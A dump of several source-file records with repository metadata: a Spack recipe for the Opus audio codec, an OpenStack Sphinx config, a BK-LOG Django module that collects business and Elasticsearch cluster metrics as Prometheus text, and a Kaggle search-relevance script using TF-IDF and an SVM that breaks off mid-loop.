] | 1 | 2020-10-14T14:20:17.000Z | 2020-10-14T14:20:17.000Z | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Opus(AutotoolsPackage):
    """Opus is a totally open, royalty-free, highly versatile audio codec."""

    homepage = "http://opus-codec.org/"
    url = "http://downloads.xiph.org/releases/opus/opus-1.1.4.tar.gz"

    # Known releases, newest first; the second argument is the tarball's
    # MD5 checksum used by Spack to verify the download.
    version('1.1.4', 'a2c09d995d0885665ff83b5df2505a5f')
    version('1.1.3', '32bbb6b557fe1b6066adc0ae1f08b629')
    version('1.1.2', '1f08a661bc72930187893a07f3741a91')
    version('1.1.1', 'cfb354d4c65217ca32a762f8ab15f2ac')
    version('1.1', 'c5a8cf7c0b066759542bc4ca46817ac6')
    version('1.0.3', '86eedbd3c5a0171d2437850435e6edff')
    version('1.0.2', 'c503ad05a59ddb44deab96204401be03')
    version('1.0.1', 'bbac19996957b404a1139816e2f357f5')
    version('1.0.0', 'ec3ff0a16d9ad8c31a8856d13d97b155')
    version('0.9.14', 'c7161b247a8437ae6b0f11dd872e69e8')
    version('0.9.10', 'afbda2fd20dc08e6075db0f60297a137')
    version('0.9.9', '0c18f0aac37f1ed955f5d694ddd88000')
    version('0.9.8', '76c1876eae9169dee808ff4710d847cf')
    version('0.9.7', '49834324ab618105cf112e161770b422')
    version('0.9.6', '030556bcaebb241505f8577e92abe6d4')
    version('0.9.5', '6bec090fd28996da0336e165b153ebd8')
    version('0.9.3', '934226d4f572d01c5848bd70538248f5')
    version('0.9.2', '8b9047956c4a781e05d3ac8565cd28f5')
    version('0.9.1', 'f58214e530928aa3db1dec217d5dfcd4')
    version('0.9.0', '8a729db587430392e64280a499e9d061')

    # Declared package dependency of the build.
    depends_on('libvorbis')
e4416677b9f1141184c6eca201978aacd9cf5679 | 7,447 | py | Python | doc/source/conf.py | openstack/i18n | 315da907d845f4d582a448351b1678ee2bb23ad1 | [
"Apache-2.0"
] | 19 | 2015-11-09T21:46:40.000Z | 2021-02-01T15:16:36.000Z | doc/source/conf.py | openstack/i18n | 315da907d845f4d582a448351b1678ee2bb23ad1 | [
"Apache-2.0"
] | 4 | 2016-08-04T15:35:57.000Z | 2021-09-24T06:32:43.000Z | doc/source/conf.py | openstack/i18n | 315da907d845f4d582a448351b1678ee2bb23ad1 | [
"Apache-2.0"
] | 4 | 2016-08-04T13:36:59.000Z | 2019-08-05T11:28:31.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['openstackdocstheme']
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/i18n'
openstackdocs_pdf_link = True
openstackdocs_bug_project = 'openstack-i18n'
openstackdocs_bug_tag = 'doc'
openstackdocs_auto_name = False
openstackdocs_auto_version = False
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'I18n Contributor Guide'
copyright = u'2015, OpenStack contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = []
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# So that we can enable "log-a-bug" links from each output HTML page, this
# variable must be set to a format that includes year, month, day, hours and
# minutes.
# html_last_updated_fmt = '%Y-%m-%d %H:%M'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# This one is needed for "Report a bug".
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'i18n-contributor-guide'
# If true, publish source files
html_copy_source = False
# -- Options for LaTeX output -------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'doc-i18n.tex', u'Internationalization Documentation',
u'OpenStack Foundation', 'howto'),
]
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| 34.004566 | 79 | 0.728347 |
75cbeb9bee7984d77b9ee71aeefbbfcdb056f126 | 23,662 | py | Python | apps/log_measure/handlers/metrics.py | qqqqqie/bk-log | 1765f1901aafaa6fb6a57b8db5d35dd32b3cb5c1 | [
"MIT"
] | null | null | null | apps/log_measure/handlers/metrics.py | qqqqqie/bk-log | 1765f1901aafaa6fb6a57b8db5d35dd32b3cb5c1 | [
"MIT"
] | null | null | null | apps/log_measure/handlers/metrics.py | qqqqqie/bk-log | 1765f1901aafaa6fb6a57b8db5d35dd32b3cb5c1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import, unicode_literals
import socket
import time
from collections import defaultdict
from functools import wraps
import arrow
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db.models import Count
from django.utils.translation import ugettext as _
from elasticsearch import Elasticsearch
from apps.api import TransferApi, NodeApi, CCApi
from apps.utils.log import logger
from apps.log_databus.constants import STORAGE_CLUSTER_TYPE
from apps.log_databus.models import CollectorConfig
from apps.log_measure.exceptions import EsConnectFailException
from apps.log_search.models import UserIndexSetSearchHistory, LogIndexSet, ProjectInfo
from bk_dataview.grafana import client as grafana_client
class Metric(object):
    """A single measurement with optional dimension (label) values.

    Knows how to render itself as one line of Prometheus exposition text.
    """

    def __init__(self, metric_name, metric_value, dimensions=None):
        # Sample name, numeric value, and optional {label: value} mapping.
        self.metric_name = metric_name
        self.metric_value = metric_value
        self.dimensions = dimensions

    def to_prometheus_text(self, namespace=None, timestamp=""):
        """Render ``[<namespace>_]<name>{labels} <value> <ts_ms>``.

        NOTE: the default ``timestamp`` of ``""`` multiplied by 1000 stays
        ``""``, so by default no timestamp is emitted (with a trailing space),
        matching the historical output format.
        """
        full_name = f"{namespace}_{self.metric_name}" if namespace else self.metric_name

        if self.dimensions:
            label_pairs = [f'{key}="{value}"' for key, value in self.dimensions.items()]
            label_text = "{" + ",".join(label_pairs) + "}"
        else:
            label_text = ""

        return f"{full_name}{label_text} {self.metric_value} {timestamp * 1000}"
def register_metric(namespace, description="", cache_time=0):
    """Decorator marking a collector method as a metric producer.

    The wrapped method gains ``namespace`` / ``description`` / ``is_metric``
    attributes (used for discovery by the collector). When ``cache_time`` is
    non-zero the result is cached under ``statistics_<namespace>`` for that
    many seconds.
    """

    def wrapped_view(func):
        def _wrapped_view(*args, **kwargs):
            cache_key = f"statistics_{namespace}"
            if cache_time:
                hit = cache.get(cache_key)
                if hit:
                    return hit
                fresh = func(*args, **kwargs)
                cache.set(cache_key, fresh, cache_time)
                return fresh
            return func(*args, **kwargs)

        _wrapped_view.namespace = namespace
        _wrapped_view.description = description
        _wrapped_view.is_metric = True
        return wraps(func)(_wrapped_view)

    return wrapped_view
class BaseMetricCollector(object):
    """Base metric collector: caches business metadata and renders the
    registered metric methods either as raw groups or Prometheus text."""

    def __init__(self, collect_interval=300):
        # Cache business (biz) metadata from CC so per-metric lookups
        # don't hit the API repeatedly.
        biz_list = CCApi.get_app_list({"fields": ["bk_biz_id", "bk_biz_name"], "no_request": True}).get("info", [])
        self.biz_info = {int(business["bk_biz_id"]): business for business in biz_list}
        # project_id -> biz info (None when the project's biz is unknown).
        self.project_biz_info = {}
        for project in ProjectInfo.objects.all():
            self.project_biz_info[project.project_id] = self.biz_info.get(project.bk_biz_id)
        # Report timestamp, aligned down to a multiple of the collect interval.
        self.collect_interval = collect_interval
        timestamp = arrow.now().timestamp
        self.report_ts = timestamp // self.collect_interval * self.collect_interval

    @property
    def time_range(self):
        # Aligned window: [report_ts - collect_interval, report_ts].
        return arrow.get(self.report_ts - self.collect_interval).datetime, arrow.get(self.report_ts).datetime

    def get_biz_name(self, bk_biz_id):
        """
        Return the business name for a business ID (falls back to the ID
        itself when the business is not in the cache).
        """
        return self.biz_info[int(bk_biz_id)]["bk_biz_name"] if int(bk_biz_id) in self.biz_info else bk_biz_id

    def collect(self, namespaces=None, response_format="prometheus"):
        """
        Collection entry point: run every registered metric method
        (optionally filtered by namespace prefix). Failures of individual
        metrics are logged and skipped. Returns raw metric groups unless
        ``response_format`` is "prometheus", in which case the groups are
        rendered as Prometheus exposition text.
        """
        metric_methods = self.list_metric_methods(namespaces)
        metric_groups = []
        for metric_method in metric_methods:
            try:
                begin_time = time.time()
                metric_groups.append(
                    {
                        "namespace": metric_method.namespace,
                        "description": metric_method.description,
                        "metrics": metric_method(),
                    }
                )
                logger.info(
                    "[statistics_data] collect metric->[{}] took {} ms".format(
                        metric_method.namespace, int((time.time() - begin_time) * 1000)
                    ),
                )
            except Exception as e:  # pylint: disable=broad-except
                logger.exception("[statistics_data] collect metric->[{}] failed: {}".format(metric_method.namespace, e))

        if response_format != "prometheus":
            return metric_groups

        metric_text_list = []
        # Convert the collected groups to Prometheus exposition format.
        for group in metric_groups:
            metric_text_list.append("# {}".format(group["description"] or group["namespace"]))
            for metric in group["metrics"]:
                metric_text_list.append(
                    metric.to_prometheus_text(namespace=group["namespace"], timestamp=self.report_ts)
                )
        return "\n".join(metric_text_list)

    @property
    def registered_metrics(self):
        # Names of all attributes decorated with @register_metric
        # (identified by the is_metric marker set by the decorator).
        return [
            method
            for method in dir(self)
            if method != "registered_metrics"
            and callable(getattr(self, method))
            and getattr(getattr(self, method), "is_metric", None)
        ]

    def list_metric_methods(self, namespaces=None):
        """
        Resolve registered metric methods, optionally filtered by namespace
        prefix.
        :param namespaces: a prefix or list of prefixes; all methods when empty.
        :return: list of bound metric methods.
        """
        namespaces = namespaces or []
        if isinstance(namespaces, str):
            namespaces = [namespaces]

        methods = []
        for metric in self.registered_metrics:
            method = getattr(self, metric)
            if not namespaces:
                methods.append(method)
            for namespace in namespaces:
                if method.namespace.startswith(namespace):
                    methods.append(method)
        return methods

    @classmethod
    def append_total_metric(cls, metrics):
        # Append a "total" metric that sums all metric values in the list;
        # mutates and returns the same list.
        total = sum(metric.metric_value for metric in metrics)
        metrics.append(
            Metric(
                metric_name="total",
                metric_value=total,
            )
        )
        return metrics
class MetricCollector(BaseMetricCollector):
    """Concrete collector: adds ES cluster metadata and per-cluster client caching."""

    def __init__(self, *args, **kwargs):
        super(MetricCollector, self).__init__(*args, **kwargs)
        # Map cluster_id -> raw cluster info for quick lookup by id.
        self.cluster_infos = {
            cluster_info["cluster_config"]["cluster_id"]: cluster_info for cluster_info in self.list_cluster_info()
        }
        # Lazily populated cache: cluster_id -> Elasticsearch client
        # (get_es_client leaves a None entry after a failed attempt).
        self._cluster_clients = {}
@staticmethod
def list_cluster_info(cluster_id=None):
"""
获取集群列表
"""
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True}
if cluster_id:
params.update({"cluster_id": cluster_id})
return TransferApi.get_cluster_info(params)
def get_es_client_by_id(self, cluster_id):
"""
根据集群ID获取ES客户端
"""
cluster_info = self.cluster_infos.get(cluster_id)
if not cluster_info:
return None
return self.get_es_client(cluster_info)
def get_es_client(self, cluster_info):
"""
根据集群信息获取ES客户端
"""
cluster_id = cluster_info["cluster_config"]["cluster_id"]
if cluster_id in self._cluster_clients:
return self._cluster_clients[cluster_id]
self._cluster_clients[cluster_id] = None
cluster_config = cluster_info["cluster_config"]
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
auth_info = cluster_info.get("auth_info", {})
username = auth_info.get("username")
password = auth_info.get("password")
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
es_address: tuple = (str(domain_name), int(port))
cs.settimeout(2)
status: int = cs.connect_ex(es_address)
if status != 0:
raise EsConnectFailException()
cs.close()
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
hosts=[domain_name],
http_auth=http_auth,
scheme="http",
port=port,
verify_certs=False,
timeout=10,
)
if not es_client.ping(params={"request_timeout": 10}):
raise EsConnectFailException()
self._cluster_clients[cluster_id] = es_client
return es_client
    @register_metric("business_active", _("活跃业务"))
    def business_active(self):
        """Emit one count metric per active business, plus a total.

        A business counts as active when one of its index sets was searched
        within the last week.
        """
        # Search histories created in the last 7 days identify the active
        # index sets.
        history_ids = UserIndexSetSearchHistory.objects.filter(
            created_at__gte=arrow.now().replace(days=-7).datetime
        ).values_list("index_set_id", flat=True)
        # Map the active index sets back to their projects.
        project_ids = set(
            LogIndexSet.objects.filter(index_set_id__in=set(history_ids)).values_list("project_id", flat=True)
        )
        metrics = [
            Metric(
                metric_name="count",
                metric_value=1,
                dimensions={
                    "target_biz_id": self.project_biz_info[project_id]["bk_biz_id"],
                    "target_biz_name": self.project_biz_info[project_id]["bk_biz_name"],
                },
            )
            for project_id in project_ids
            # Skip projects whose business could not be resolved in __init__.
            if self.project_biz_info.get(project_id)
        ]
        metrics = self.append_total_metric(metrics)
        return metrics
@register_metric("user_active", _("活跃用户"))
def user_active(self):
user_model = get_user_model()
recent_login_users = user_model.objects.filter(last_login__gte=self.time_range[0])
metrics = [
Metric(metric_name="count", metric_value=1, dimensions={"username": user.username})
for user in recent_login_users
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_config", _("采集配置"))
def collector_config(self):
groups = (
CollectorConfig.objects.filter(is_active=True)
.values("bk_biz_id")
.order_by()
.annotate(count=Count("collector_config_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_host", _("采集主机"), cache_time=60 * 60)
def collect_host(self):
configs = CollectorConfig.objects.filter(is_active=True).values(
"bk_biz_id", "subscription_id", "category_id", "collector_config_id"
)
biz_mapping = {
config["subscription_id"]: {
"bk_biz_id": config["bk_biz_id"],
"category_id": config["category_id"],
"collector_config_id": config["collector_config_id"],
}
for config in configs
if config["subscription_id"]
}
groups = NodeApi.get_subscription_instance_status(
{"subscription_id_list": list(biz_mapping.keys()), "no_request": True}
)
metrics = [
Metric(
metric_name="count",
metric_value=len(group["instances"]),
dimensions={
"target_biz_id": biz_mapping[group["subscription_id"]]["bk_biz_id"],
"target_biz_name": self.get_biz_name(biz_mapping[group["subscription_id"]]["bk_biz_id"]),
"category_id": biz_mapping[group["subscription_id"]]["category_id"],
"collector_config_id": biz_mapping[group["subscription_id"]]["collector_config_id"],
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("index_set", _("索引集"))
def index_set(self):
groups = (
LogIndexSet.objects.values("project_id", "scenario_id").order_by().annotate(count=Count("index_set_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": self.project_biz_info[group["project_id"]]["bk_biz_id"],
"target_biz_name": self.project_biz_info[group["project_id"]]["bk_biz_name"],
"scenario_id": group["scenario_id"],
},
)
for group in groups
if self.project_biz_info.get(group["project_id"])
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("third_party_es", _("第三方ES"))
def third_party_es(self):
clusters = TransferApi.get_cluster_info({"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True})
groups = defaultdict(int)
for cluster in clusters:
if cluster["cluster_config"]["registered_system"] == "_default":
continue
bk_biz_id = cluster["cluster_config"]["custom_option"]["bk_biz_id"]
if not bk_biz_id:
continue
groups[bk_biz_id] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in groups.items()
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("cluster_health", _("集群健康度"))
def cluster_health(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
health_data = es_client.cluster.health(params={"request_timeout": 10})
dimensions = {
"origin_cluster_name": health_data["cluster_name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in [
"number_of_nodes",
"number_of_data_nodes",
"active_primary_shards",
"active_shards",
"relocating_shards",
"initializing_shards",
"unassigned_shards",
"delayed_unassigned_shards",
"number_of_pending_tasks",
"number_of_in_flight_fetch",
"task_max_waiting_in_queue_millis",
"active_shards_percent_as_number",
]:
if key not in health_data:
continue
metrics.append(
Metric(
metric_name=key,
metric_value=health_data[key],
dimensions=dimensions,
)
)
# 状态字段需要单独处理
status_mapping = {
"green": 0,
"yellow": 1,
"red": 2,
}
metrics.append(
Metric(
metric_name="status",
metric_value=status_mapping[health_data["status"]],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_health metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("cluster_node", _("集群节点"))
def cluster_node(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
allocations = es_client.cat.allocation(format="json", bytes="mb", params={"request_timeout": 10})
for allocation in allocations:
if allocation["node"] == "UNASSIGNED":
# 未分配的节点忽略
continue
dimensions = {
"node_ip": allocation["ip"],
"node": allocation["node"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["shards", "disk.indices", "disk.used", "disk.avail", "disk.total", "disk.percent"]:
if key not in allocation:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=allocation[key],
dimensions=dimensions,
)
)
nodes = es_client.cat.nodes(format="json", params={"request_timeout": 10})
for node in nodes:
dimensions = {
"node_ip": node["ip"],
"node": node["name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["heap.percent", "ram.percent", "cpu", "load_1m", "load_5m", "load_15m"]:
if key not in node:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=node[key],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_node metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("grafana_dashboard", _("Grafana 仪表盘"), cache_time=60 * 60)
def grafana_dashboard(self):
metrics = []
all_organization = grafana_client.get_all_organization().json()
for org in all_organization:
org_name = org["name"]
if not org_name.isdigit():
continue
if int(org_name) not in self.biz_info:
continue
dashboards = grafana_client.search_dashboard(org_id=org["id"]).json()
metrics.append(
Metric(
metric_name="count",
metric_value=len(dashboards),
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
panel_count = 0
for dashboard in dashboards:
dashboard_info = (
grafana_client.get_dashboard_by_uid(org_id=org["id"], dashboard_uid=dashboard["uid"])
.json()
.get("dashboard", {})
)
for panel in dashboard_info.get("panels", []):
if panel["type"] == "row":
# 如果是行类型,需要统计嵌套数量
panel_count += len(panel.get("panels", []))
else:
panel_count += 1
metrics.append(
Metric(
metric_name="panel_count",
metric_value=panel_count,
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
return metrics
@register_metric("log_extract_strategy", _("日志提取策略"))
def log_extract_strategy(self):
from apps.log_extract.models import Strategies
groups = Strategies.objects.all().values("bk_biz_id").order_by().annotate(count=Count("strategy_id"))
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("log_extract_task", _("日志提取任务"))
def log_extract_task(self):
from apps.log_extract.models import Tasks
groups = Tasks.objects.all().values("bk_biz_id", "created_by").order_by().annotate(count=Count("task_id"))
# 每个业务的任务数
biz_count_groups = defaultdict(int)
# 每个业务的用户数
user_count_groups = defaultdict(int)
for group in groups:
biz_count_groups[group["bk_biz_id"]] += group["count"]
user_count_groups[group["bk_biz_id"]] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in biz_count_groups.items()
]
metrics = self.append_total_metric(metrics)
metrics += [
Metric(
metric_name="user_count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in user_count_groups.items()
]
return metrics
| 36.856698 | 120 | 0.561237 |
20003b44d4a56c655dc208fa8e485b7423255354 | 3,621 | py | Python | Search_result/srr5.py | tanayz/Kaggle | 0dabcf5ccc2432cecd12f91fba9dfda64dc1afdd | [
"Apache-2.0"
] | null | null | null | Search_result/srr5.py | tanayz/Kaggle | 0dabcf5ccc2432cecd12f91fba9dfda64dc1afdd | [
"Apache-2.0"
] | null | null | null | Search_result/srr5.py | tanayz/Kaggle | 0dabcf5ccc2432cecd12f91fba9dfda64dc1afdd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 2 17:39:57 2015
@author: tanay
"""
# Standard library
import re
import string

# Third-party
import pandas as pd
from bs4 import BeautifulSoup
from nltk.stem.porter import PorterStemmer
from sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier
from sklearn import pipeline, metrics, grid_search
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction import text
from sklearn.decomposition import TruncatedSVD
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC  # required by the SVC pipeline step below (was missing)
#from sklearn.linear_model import LogisticRegression
from sklearn import pipeline#, metrics, grid_search,decomposition,
# array declarations
sw=[]               # NOTE(review): declared but never used in this script
s_data = []         # training documents (prefixed, stemmed text)
s_labels = []       # training labels (median_relevance as strings)
t_data = []         # test documents
t_labels = []       # NOTE(review): declared but never used in this script
stemmer = PorterStemmer()

#stopwords tweak - more overhead
# Domain-specific noise tokens (HTML/CSS artifacts, stemmed fragments and
# bare digits) merged into sklearn's English stop-word list below.
stop_words = ['http','www','img','border','color','style','padding','table','font','thi','inch','ha','width','height',
              '0','1','2','3','4','5','6','7','8','9']
#stop_words = text.ENGLISH_STOP_WORDS.union(stop_words)
#stop_words = ['http','www','img','border','0','1','2','3','4','5','6','7','8','9']
stop_words = text.ENGLISH_STOP_WORDS.union(stop_words)
punct = string.punctuation
punct_re = re.compile('[{}]'.format(re.escape(punct)))  # NOTE(review): compiled but unused below
#remove html, remove non text or numeric, make query and title unique features for counts using prefix (accounted for in stopwords tweak)
stemmer = PorterStemmer()  # NOTE(review): redundant re-instantiation (already created above)
train = pd.read_csv("../input/train.csv").fillna("")
test = pd.read_csv("../input/test.csv").fillna("")

# Build one document per training row: query terms prefixed with "q" and
# title terms prefixed with "z" (so they count as distinct TF-IDF features),
# plus the raw product description; strip HTML, keep alphanumerics, then
# Porter-stem every token.
for i in range(len(train.id)):
    s=(" ").join(["q"+ z for z in BeautifulSoup(train["query"][i]).get_text(" ").split(" ")]) + " " + (" ").join(["z"+ z for z in BeautifulSoup(train.product_title[i]).get_text(" ").split(" ")]) + " " + BeautifulSoup(train.product_description[i]).get_text(" ")
    s=re.sub("[^a-zA-Z0-9]"," ", s)
    s= (" ").join([stemmer.stem(z) for z in s.split(" ")])
    s_data.append(s)
    s_labels.append(str(train["median_relevance"][i]))

# Same transformation for the test rows (no labels collected).
for i in range(len(test.id)):
    s=(" ").join(["q"+ z for z in BeautifulSoup(test["query"][i]).get_text().split(" ")]) + " " + (" ").join(["z"+ z for z in BeautifulSoup(test.product_title[i]).get_text().split(" ")]) + " " + BeautifulSoup(test.product_description[i]).get_text()
    s=re.sub("[^a-zA-Z0-9]"," ", s)
    s= (" ").join([stemmer.stem(z) for z in s.split(" ")])
    t_data.append(s)
# Full text pipeline: TF-IDF (word 1-2 grams) -> LSA dimensionality reduction
# (TruncatedSVD) -> standardization -> RBF SVC classifier.
clf = pipeline.Pipeline([('v',TfidfVectorizer(min_df=5, max_df=500, max_features=None, strip_accents='unicode', analyzer='word', token_pattern=r'\w{1,}', ngram_range=(1, 2), use_idf=True, smooth_idf=True, sublinear_tf=True, stop_words = 'english')),
                         ('svd', TruncatedSVD(n_components=300, algorithm='randomized', n_iter=5, random_state=None, tol=0.0)),
                         ('scl', StandardScaler(copy=True, with_mean=True, with_std=True)),
                         ('svc', SVC(C=10))])

# Grid search over gamma only (C and the SVD size are fixed), scored with
# 5-fold cross-validation across all cores.
param_grid = {'svc__C': [10],'svc__gamma': [0,0.001,0.0001,0.00001],'svd__n_components': [300]}
model = grid_search.GridSearchCV(estimator = clf, param_grid=param_grid,
                                 verbose=10, n_jobs=-1, iid=True, refit=True, cv=5)

# Fit Grid Search Model
model.fit(s_data, s_labels)
print("Best score: %0.3f" % model.best_score_)
print("Best parameters set:")
best_parameters = model.best_estimator_.get_params()
for param_name in sorted(param_grid.keys()):
